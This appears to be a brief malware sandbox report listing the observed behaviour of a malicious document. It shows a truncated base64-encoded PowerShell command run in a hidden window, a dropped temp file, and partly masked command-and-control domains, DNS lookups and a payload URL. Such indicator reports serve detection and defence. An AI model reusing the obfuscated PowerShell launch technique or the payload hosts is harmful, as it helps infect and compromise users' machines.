Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHYAaAAyADUAeAB2AD0AKAAoACcAQQAnACsAJwB5ADgAbgBzACcAKQArACcAMABzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1394430.cvr
- 'wu##ish.com':80
- 'en###jia.com':80
- 'ae##c.com':443
- http://en###jia.com/oxl/k/
- DNS ASK wu##ish.com
- DNS ASK en###jia.com
- DNS ASK ha####yimpex.com
- DNS ASK ae##c.com
- DNS ASK bl##.#888168.xyz
- DNS ASK in#######ts.azurewebsites.net
- DNS ASK la###inaja.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHYAaAAyADUAeAB2AD0AKAAoACcAQQAnACsAJwB5ADgAbgBzACcAKQArACcAMABzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (with a hidden window)